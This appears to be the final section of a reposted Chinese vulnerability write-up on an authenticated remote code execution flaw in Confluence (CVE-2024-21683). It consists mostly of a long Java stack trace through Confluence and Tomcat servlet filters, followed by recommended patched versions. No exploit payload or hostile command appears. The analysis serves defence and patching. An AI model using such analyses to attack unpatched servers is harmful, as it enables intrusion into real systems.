doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:56, PrettyUrlsCombinedMatchDispatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsCombinedMatchDispatcherFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
doFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.java
doFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.java
doFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter), JohnsonServletFilterModuleContainerFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:62, WebSudoFilter (com.atlassian.confluence.impl.webapp.sudo), WebSudoFilter.java
doFilter:53, HttpFilter (javax.servlet.http), HttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:96, StrutsPrepareFilter (org.apache.struts2.dispatcher.filter), StrutsPrepareFilter.java
doFilter:66, ConfluenceStrutsPrepareFilter (com.atlassian.confluence.impl.struts), ConfluenceStrutsPrepareFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:97, JmxFilter (com.atlassian.confluence.jmx), JmxFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:22, TransactionalCacheFactoryCleanupFilter (com.atlassian.confluence.cache), TransactionalCacheFactoryCleanupFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:17, ServletContextThreadLocalFilter (com.atlassian.core.filters), ServletContextThreadLocalFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:31, UserLoggingContextFilter (com.atlassian.confluence.util), UserLoggingContextFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:25, UserNameHeaderFilter (com.atlassian.confluence.util), UserNameHeaderFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilterInternal:31, MauEventFilter (com.atlassian.confluence.web.filter), MauEventFilter.java
doFilter:44, AbstractStaticResourceAwareFilter (com.atlassian.confluence.web.filter), AbstractStaticResourceAwareFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:39, UserThreadLocalFilter (com.atlassian.confluence.util), UserThreadLocalFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:57, ConfluenceTimeoutFilter (com.atlassian.confluence.web.filter), ConfluenceTimeoutFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:83, HttpSessionRegistrarFilter (com.atlassian.confluence.web.filter), HttpSessionRegistrarFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:242, SecurityFilter (com.atlassian.seraph.filter), SecurityFilter.java
applyFilter:40, ConfluenceSecurityFilter (com.atlassian.confluence.web.filter), ConfluenceSecurityFilter.java
doFilter:29, ConfluenceSecurityFilter (com.atlassian.confluence.web.filter), ConfluenceSecurityFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:94, TrustedApplicationsFilter (com.atlassian.security.auth.trustedapps.filter), TrustedApplicationsFilter.java
doFilter:35, AbstractBootstrapHotSwappingFilter (com.atlassian.confluence.util), AbstractBootstrapHotSwappingFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:148, BaseLoginFilter (com.atlassian.seraph.filter), BaseLoginFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:67, OAuthFilter (com.atlassian.oauth.serviceprovider.internal.servlet), OAuthFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:82, TokenBasedAuthenticationFilter (com.atlassian.pats.web.filter), TokenBasedAuthenticationFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:81, AccessTokenFilter (com.atlassian.oauth2.provider.core.web), AccessTokenFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:56, PrettyUrlsCombinedMatchDispatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsCombinedMatchDispatcherFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
doFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.java
doFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.java
doFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter), JohnsonServletFilterModuleContainerFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:57, ClusterHeaderFilter (com.atlassian.confluence.util), ClusterHeaderFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilterInternal:156, OpenSessionInViewFilter (org.springframework.orm.hibernate5.support), OpenSessionInViewFilter.java
doFilterInternal:39, ConfluenceOpenSessionInViewFilter (com.atlassian.confluence.web.filter), ConfluenceOpenSessionInViewFilter.java
doFilter:117, OncePerRequestFilter (org.springframework.web.filter), OncePerRequestFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:24, ConfluenceErrorFilter (com.atlassian.confluence.util), ConfluenceErrorFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:104, ProfilingFilter (com.atlassian.util.profiling.filters), ProfilingFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:39, RequestTimeThreadLocalFilter (com.atlassian.confluence.core.datetime), RequestTimeThreadLocalFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:31, AbstractCachingFilter (com.atlassian.core.filters.cache), AbstractCachingFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:70, DisableBasicAuthFilter (com.atlassian.plugins.authentication.impl.basicauth.filter), DisableBasicAuthFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:26, DefaultAnalyticsFilter (com.atlassian.analytics.client.filter), DefaultAnalyticsFilter.java
doFilter:33, AbstractHttpFilter (com.atlassian.analytics.client.filter), AbstractHttpFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:37, JwtAuthFilter (com.atlassian.jwt.internal.servlet), JwtAuthFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:46, AbstractThreadNamingFilter (com.atlassian.troubleshooting.thready.filter), AbstractThreadNamingFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:58, HttpRequestStatsFilter (com.atlassian.confluence.web.filter), HttpRequestStatsFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilterInternal:114, GzipFilter (com.atlassian.gzipfilter), GzipFilter.java
doFilter:91, GzipFilter (com.atlassian.gzipfilter), GzipFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:47, ConfluenceTimingFilter (com.atlassian.confluence.web.filter), ConfluenceTimingFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:56, PrettyUrlsCombinedMatchDispatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsCombinedMatchDispatcherFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
lambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:-1, 1042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown Source
doFilter:71, WebdavRequestForwardFilter (com.atlassian.confluence.extra.webdav.servlet.filter), WebdavRequestForwardFilter.java
doFilter:29, AbstractHttpFilter (com.atlassian.confluence.extra.webdav.servlet.filter), AbstractHttpFilter.java
doFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.java
doFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.java
doFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.java
doFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.java
doFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter), JohnsonServletFilterModuleContainerFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:36, MobileAppRequestFilter (com.atlassian.confluence.util), MobileAppRequestFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:59, IgnoreWebAsyncManagerFilter (com.atlassian.confluence.internal.web.filter.spring), IgnoreWebAsyncManagerFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:51, RequestParamValidationFilter (com.atlassian.confluence.web.filter.validateparam), RequestParamValidationFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:39, TranslationModeFilter (com.atlassian.confluence.web.filter), TranslationModeFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:39, LanguageExtractionFilter (com.atlassian.confluence.web.filter), LanguageExtractionFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
lambda$doFilter$3:44, VCacheRequestContextFilter (com.atlassian.confluence.impl.vcache), VCacheRequestContextFilter.java
perform:-1, 1655779650 (com.atlassian.confluence.impl.vcache.VCacheRequestContextFilter$$Lambda$3822), Unknown Source
doInRequestContextInternal:84, VCacheRequestContextManager (com.atlassian.confluence.impl.vcache), VCacheRequestContextManager.java
doInRequestContext:68, VCacheRequestContextManager (com.atlassian.confluence.impl.vcache), VCacheRequestContextManager.java
doFilter:43, VCacheRequestContextFilter (com.atlassian.confluence.impl.vcache), VCacheRequestContextFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:32, LoggingContextFilter (com.atlassian.confluence.util), LoggingContextFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:67, RequestCacheThreadLocalFilter (com.atlassian.confluence.util), RequestCacheThreadLocalFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:87, TracingFilter (brave.servlet), TracingFilter.java
doFilter:49, ZipkinTracingFilter (com.atlassian.confluence.web.filter), ZipkinTracingFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:25, ResponseOutputStreamFilter (com.atlassian.confluence.web.filter), ResponseOutputStreamFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:59, AbstractJohnsonFilter (com.atlassian.johnson.filters), AbstractJohnsonFilter.java
doFilter:32, ConfluenceJohnsonFilter (com.atlassian.confluence.web), ConfluenceJohnsonFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilterInternal:35, ConfluenceEncodingFilter (com.atlassian.confluence.setup), ConfluenceEncodingFilter.java
doFilter:44, AbstractStaticResourceAwareFilter (com.atlassian.confluence.web.filter), AbstractStaticResourceAwareFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:25, ThreadLocalCacheFilter (com.atlassian.confluence.web.filter), ThreadLocalCacheFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:37, HeaderSanitisingFilter (com.atlassian.core.filters), HeaderSanitisingFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:64, FourOhFourErrorLoggingFilter (com.atlassian.confluence.servlet), FourOhFourErrorLoggingFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:35, IpdHttpMonitoringFilter (com.atlassian.confluence.internal.diagnostics.ipd.http), IpdHttpMonitoringFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:42, HttpRequestMonitoringFilter (com.atlassian.confluence.internal.diagnostics), HttpRequestMonitoringFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:129, HttpHeaderSecurityFilter (org.apache.catalina.filters), HttpHeaderSecurityFilter.java
doFilter:48, ConfluenceHttpHeaderSecurityFilter (com.atlassian.confluence.impl.webapp), ConfluenceHttpHeaderSecurityFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:63, DebugFilter (com.atlassian.confluence.web.filter), DebugFilter.java
doFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.java
internalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
doFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.java
invoke:168, StandardWrapperValve (org.apache.catalina.core), StandardWrapperValve.java
invoke:90, StandardContextValve (org.apache.catalina.core), StandardContextValve.java
invoke:481, AuthenticatorBase (org.apache.catalina.authenticator), AuthenticatorBase.java
invoke:765, RemoteIpValve (org.apache.catalina.valves), RemoteIpValve.java
invoke:670, AbstractAccessLogValve (org.apache.catalina.valves), AbstractAccessLogValve.java
invoke:185, StuckThreadDetectionValve (org.apache.catalina.valves), StuckThreadDetectionValve.java
invoke:130, StandardHostValve (org.apache.catalina.core), StandardHostValve.java
invoke:93, ErrorReportValve (org.apache.catalina.valves), ErrorReportValve.java
invoke:74, StandardEngineValve (org.apache.catalina.core), StandardEngineValve.java
service:342, CoyoteAdapter (org.apache.catalina.connector), CoyoteAdapter.java
service:390, Http11Processor (org.apache.coyote.http11), Http11Processor.java
process:63, AbstractProcessorLight (org.apache.coyote), AbstractProcessorLight.java
process:928, AbstractProtocol$ConnectionHandler (org.apache.coyote), AbstractProtocol.java
doRun:1794, NioEndpoint$SocketProcessor (org.apache.tomcat.util.net), NioEndpoint.java
run:52, SocketProcessorBase (org.apache.tomcat.util.net), SocketProcessorBase.java
runWorker:1191, ThreadPoolExecutor (org.apache.tomcat.util.threads), ThreadPoolExecutor.java
run:659, ThreadPoolExecutor$Worker (org.apache.tomcat.util.threads), ThreadPoolExecutor.java
run:61, TaskThread$WrappingRunnable (org.apache.tomcat.util.threads), TaskThread.java
run:829, Thread (java.lang), Thread.java
升级版本
-
8.9.1 Data Center Only -
8.5.9 (LTS) recommended -
7.19.22 (LTS)
原文始发于微信公众号(OneTS安全团队):Confluence认证后RCE(CVE-2024-21683)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论